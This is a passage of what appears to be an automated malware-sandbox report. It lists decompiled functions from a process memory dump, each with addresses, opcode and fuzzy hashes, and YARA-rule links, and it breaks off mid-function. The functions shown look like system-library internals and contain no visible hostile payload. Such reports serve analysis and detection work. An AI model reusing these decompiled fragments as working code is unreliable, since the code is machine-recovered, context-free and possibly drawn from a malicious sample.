					E02B12280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2be86ac);
					E02AFF900(0x2be86d4, _t28);
					E02B0FFB0(0x2be86ac, _t28, 0x2be86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E02B0FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                        0x02bc401a
                        0x02bc401e
                        0x02bc4023
                        0x02bc4028
                        0x02bc4029
                        0x02bc402b
                        0x02bc402f
                        0x02bc4043
                        0x02bc4046
                        0x02bc4051
                        0x02bc4057
                        0x02bc405f
                        0x02bc4062
                        0x02bc4067
                        0x02bc406f
                        0x02bc407c
                        0x02bc407c
                        0x02bc408c
                        0x02bc408c
                        0x02bc4097

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83842076584d6b761d2a0f0a472c25fa4eab18ccbe9bb8b0a5b895287815d0c7
                        • Instruction ID: b66a07a6b62bbff5398aa263e65b0d521e7b7c9e1fd0930844ebb88a37d305cc
                        • Opcode Fuzzy Hash: 83842076584d6b761d2a0f0a472c25fa4eab18ccbe9bb8b0a5b895287815d0c7
                        • Instruction Fuzzy Hash: 2E01A2723419457FD621AB79CE80E17F7ADFF45760B0002A9F50883A61CF24EC11CAE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BB138A, Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E02BB138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2bed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02B3FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E02B17D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                        0x02bb138a
                        0x02bb138a
                        0x02bb1399
                        0x02bb13a3
                        0x02bb13a8
                        0x02bb13aa
                        0x02bb13b5
                        0x02bb13bb
                        0x02bb13c3
                        0x02bb13c6
                        0x02bb13c9
                        0x02bb13d4
                        0x02bb13e6
                        0x02bb13d6
                        0x02bb13df
                        0x02bb13df
                        0x02bb13f1
                        0x02bb13f2
                        0x02bb13f4
                        0x02bb13f9
                        0x02bb140e

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 133d0ae560780e30d2d11680d2156afce1d15bd5d2100a386c3caaeaeab0af12
                        • Instruction ID: ce4d93f3f90c42a29dee7691463426b10fe3f5c7f17671561f54b3448368d059
                        • Opcode Fuzzy Hash: 133d0ae560780e30d2d11680d2156afce1d15bd5d2100a386c3caaeaeab0af12
                        • Instruction Fuzzy Hash: A6015271E00618AFCB15DFA9D841EAEB7B8EF44710F404096F914EB280EAB49A41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BB14FB, Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        C-Code - Quality: 61%
                        			E02BB14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2bed360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02B3FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E02B17D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                        0x02bb14fb
                        0x02bb14fb
                        0x02bb150a
                        0x02bb1514
                        0x02bb1519
                        0x02bb151b
                        0x02bb1526
                        0x02bb152c
                        0x02bb1534
                        0x02bb1537
                        0x02bb153a
                        0x02bb1545
                        0x02bb1557
                        0x02bb1547
                        0x02bb1550
                        0x02bb1550
                        0x02bb1562
                        0x02bb1563
                        0x02bb1565
                        0x02bb156a
                        0x02bb157f

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7507dd2f331328ecc9c354ed4008976ce7424e6086683d096bf982a5d47b3c20
                        • Instruction ID: bfc6b31f15e4ee4f8425e6aab8d2b6857ef6603fc7869561b204f4c33109ad36
                        • Opcode Fuzzy Hash: 7507dd2f331328ecc9c354ed4008976ce7424e6086683d096bf982a5d47b3c20
                        • Instruction Fuzzy Hash: E1015E71E01258AFCB15DFA9D845FAEBBB8EF45710F4040A6F915EB281DAB4DA00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AF58EC, Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E02AF58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x2bed360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x2ad5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E02AF5943() != 0 &&  *0x2be5320 > 5) {
					E02B77B5E( &_v44, _t27);
					_t22 =  &_v28;
					E02B77B5E( &_v28, _t28);
					_t11 = E02B77B9C(0x2be5320, 0x2adbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E02B3B640(_t11, _t17, _v8 ^ _t29, 0x2adbf15, _t27, _t28);
			}















                        0x02af58fb
                        0x02af58fe
                        0x02af5906
                        0x02af590a
                        0x02af593c
                        0x02af593c
                        0x02af590c
                        0x02af590c
                        0x02af5911
                        0x00000000
                        0x02af5913
                        0x02af5913
                        0x02af5913
                        0x02af5911
                        0x02af591d
                        0x02b51035
                        0x02b5103c
                        0x02b5103f
                        0x02b51056
                        0x02b51056
                        0x02af593b

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f204e4443e4a187f7fe01b00e28cc77f5e331baffad9f875cbad4a6a7871d94
                        • Instruction ID: e14c85843e65dbf3e31e93e226828d8f68b59603b85ebe2792668a6e8d978fe5
                        • Opcode Fuzzy Hash: 2f204e4443e4a187f7fe01b00e28cc77f5e331baffad9f875cbad4a6a7871d94
                        • Instruction Fuzzy Hash: 87018431E00508DBCB58DBA9D8909AFB7ADEF44264BD540A9AE169B344DE20DD01CA90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B0B02A, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B0B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E02B17D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E02B77016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                        0x02b0b037
                        0x02b0b039
                        0x02b0b03b
                        0x02b0b040
                        0x02b5a60e
                        0x00000000
                        0x00000000
                        0x02b5a61d
                        0x02b0b04b
                        0x02b0b04e
                        0x02b5a627
                        0x02b5a634
                        0x00000000
                        0x00000000
                        0x02b5a641
                        0x02b5a653
                        0x02b5a643
                        0x02b5a64c
                        0x02b5a64c
                        0x02b5a65b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b5a66c
                        0x02b0b057
                        0x02b0b057
                        0x02b0b057
                        0x02b0b046
                        0x02b0b046
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: 243e330ba85cf1a3deee2964009e24cc9a60906d9a01d92fca1df7da84f62e04
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 10018F722009849FD327871CC988F667BE8FB45758F0900E1F919CBB91EB38DC80C621
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC1074, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02BC1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E02BC165E(__ebx, 0x2be8ae4, (__edx -  *0x2be8b04 >> 0x14) + (__edx -  *0x2be8b04 >> 0x14), __edi, __ecx, (__edx -  *0x2be8b04 >> 0x14) + (__edx -  *0x2be8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E02BBAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E02B17D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E02BAFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                        0x02bc1074
                        0x02bc1080
                        0x02bc1082
                        0x02bc108a
                        0x02bc108f
                        0x02bc1093
                        0x02bc10ab
                        0x02bc10ab
                        0x02bc10c3
                        0x02bc10cf
                        0x02bc10e1
                        0x02bc10d1
                        0x02bc10da
                        0x02bc10da
                        0x02bc10e9
                        0x02bc10f5
                        0x02bc10f5
                        0x02bc10fe

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c96e1f42edda5ee82f6a097ec2ba7cbe690ebdc28c6f1c8598e1a25e5471e27
                        • Instruction ID: 656feb9f95ca5ddc492120d224573806ef588e95a60b89cf1c1b1099a3869357
                        • Opcode Fuzzy Hash: 5c96e1f42edda5ee82f6a097ec2ba7cbe690ebdc28c6f1c8598e1a25e5471e27
                        • Instruction Fuzzy Hash: ED0128725147419BC711EB2CC944B5A77E6EF84314F1486ADF88AA3691DF31D840CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BAFEC0, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E02BAFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2bed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02B3FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E02B17D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x02bafec0
                        0x02bafec0
                        0x02bafecf
                        0x02bafed9
                        0x02bafede
                        0x02bafee0
                        0x02bafeeb
                        0x02bafef3
                        0x02bafef6
                        0x02bafef9
                        0x02baff04
                        0x02baff16
                        0x02baff06
                        0x02baff0f
                        0x02baff0f
                        0x02baff21
                        0x02baff22
                        0x02baff24
                        0x02baff29
                        0x02baff3e

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d72517d501e5e292e7a33581f588d76c3b47fff3eabf4e4b837caeca3cd87e7d
                        • Instruction ID: 5f5333b25d85e7cf91f5fc4007addb9777ddff6238958bc3a6c89f5fd04e4535
                        • Opcode Fuzzy Hash: d72517d501e5e292e7a33581f588d76c3b47fff3eabf4e4b837caeca3cd87e7d
                        • Instruction Fuzzy Hash: A8018471E01608ABCB14DFA9D845FBEB7B8EF45700F4040A6FA10AB290DA719A01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BAFE3F, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E02BAFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2bed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02B3FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E02B17D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x02bafe3f
                        0x02bafe3f
                        0x02bafe4e
                        0x02bafe58
                        0x02bafe5d
                        0x02bafe5f
                        0x02bafe6a
                        0x02bafe72
                        0x02bafe75
                        0x02bafe78
                        0x02bafe83
                        0x02bafe95
                        0x02bafe85
                        0x02bafe8e
                        0x02bafe8e
                        0x02bafea0
                        0x02bafea1
                        0x02bafea3
                        0x02bafea8
                        0x02bafebd

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a68085b52b0b654d5c60cb7149670b1c1b814c0c36089606f18e2623a339e7b
                        • Instruction ID: efa8b32db12300c28c9f01cc567a4690faf577156aa3cc170ed859ecfbbcfdc6
                        • Opcode Fuzzy Hash: 4a68085b52b0b654d5c60cb7149670b1c1b814c0c36089606f18e2623a339e7b
                        • Instruction Fuzzy Hash: 1F018F71E04208ABCB14DFA9D845FBEBBB9EF44704F0040A6F914AB291DA719A11CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC8A62, Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E02BC8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x2bed360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E02B17D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02B3B640(E02B39AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x02bc8a62
                        0x02bc8a71
                        0x02bc8a79
                        0x02bc8a82
                        0x02bc8a85
                        0x02bc8a89
                        0x02bc8a8c
                        0x02bc8a8f
                        0x02bc8a92
                        0x02bc8a95
                        0x02bc8a9f
                        0x02bc8ab1
                        0x02bc8aa1
                        0x02bc8aaa
                        0x02bc8aaa
                        0x02bc8abc
                        0x02bc8abd
                        0x02bc8abf
                        0x02bc8ac4
                        0x02bc8ada

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2d301971acc0ba64ceab0d1346091f7a958dda8868a394d52a4a3f8cddd913b
                        • Instruction ID: b3d00af36910657094c295bfe727cc933017638924530b00e7bf70c5d52a7a68
                        • Opcode Fuzzy Hash: d2d301971acc0ba64ceab0d1346091f7a958dda8868a394d52a4a3f8cddd913b
                        • Instruction Fuzzy Hash: 9E012CB1A0061DAFCB05DFA9D9419AEB7B8EF48310F10409AF914E7351DB74A900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC8ED6, Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E02BC8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x2bed360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E02B17D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E02B3B640(E02B39AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                        0x02bc8ed6
                        0x02bc8ee5
                        0x02bc8eed
                        0x02bc8ef0
                        0x02bc8efa
                        0x02bc8f03
                        0x02bc8f0c
                        0x02bc8f15
                        0x02bc8f24
                        0x02bc8f27
                        0x02bc8f31
                        0x02bc8f43
                        0x02bc8f33
                        0x02bc8f3c
                        0x02bc8f3c
                        0x02bc8f4e
                        0x02bc8f4f
                        0x02bc8f51
                        0x02bc8f56
                        0x02bc8f69

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bbe5b73f2e71d4e94467a5e67b2866a6236cd04c51ef224b76f695541176933a
                        • Instruction ID: 9cd3795f666e667401f2b357a0c86f931d3bd9c5d83fd69a72b256f6115447fb
                        • Opcode Fuzzy Hash: bbe5b73f2e71d4e94467a5e67b2866a6236cd04c51ef224b76f695541176933a
                        • Instruction Fuzzy Hash: 6A11CC70E006599FDB05DFA9D541AAEF7F4FB08300F1446AAE519EB782E6749940CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFDB60, Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02AFDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E02AFDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E02AFE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L02AFE8B0(__ecx, _t14, 0xfff);
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                        0x02afdb64
                        0x02afdb66
                        0x02afdb6b
                        0x02afdbaa
                        0x02afdb71
                        0x02afdb76
                        0x02afdb7a
                        0x02afdba3
                        0x02afdb7c
                        0x02afdb87
                        0x02afdb8b
                        0x02b54fa1
                        0x02b54fb3
                        0x02b54fb8
                        0x02afdb91
                        0x02afdb96
                        0x02afdb98
                        0x02afdb98
                        0x02afdb8b
                        0x02afdb7a
                        0x02afdb9d
                        0x02afdba2

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: 950b1b915afb6bc08b2dfebf15f458067c0ac7793c9eebbe625de744f01c25fc
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: E3F06833241A629BD7736FD549C4B57A6A69F81A60F150075B7059B244CE788C029AD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFB1E1, Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02AFB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E02B17D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E02B17D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E02B77016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                        0x02afb1e8
                        0x02afb1ea
                        0x02afb1f3
                        0x02b54a17
                        0x02afb1f9
                        0x02afb1f9
                        0x02afb1f9
                        0x02afb201
                        0x02b54a21
                        0x02b54a2e
                        0x00000000
                        0x00000000
                        0x02b54a3b
                        0x02b54a4d
                        0x02b54a3d
                        0x02b54a46
                        0x02b54a46
                        0x02b54a55
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02afb20a
                        0x02afb20a
                        0x02afb20a
                        0x02afb20a

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 71691deb4e4790ebd7f799e7983518e3aad77581572cfd36cd26e941e769ac74
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 7D01F9322005849BD322975DC844F59BBB9EF45758F0804E1FE248B6B1EF78C840D724
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B8FE87, Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E02B8FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x2bed360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E02B17D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
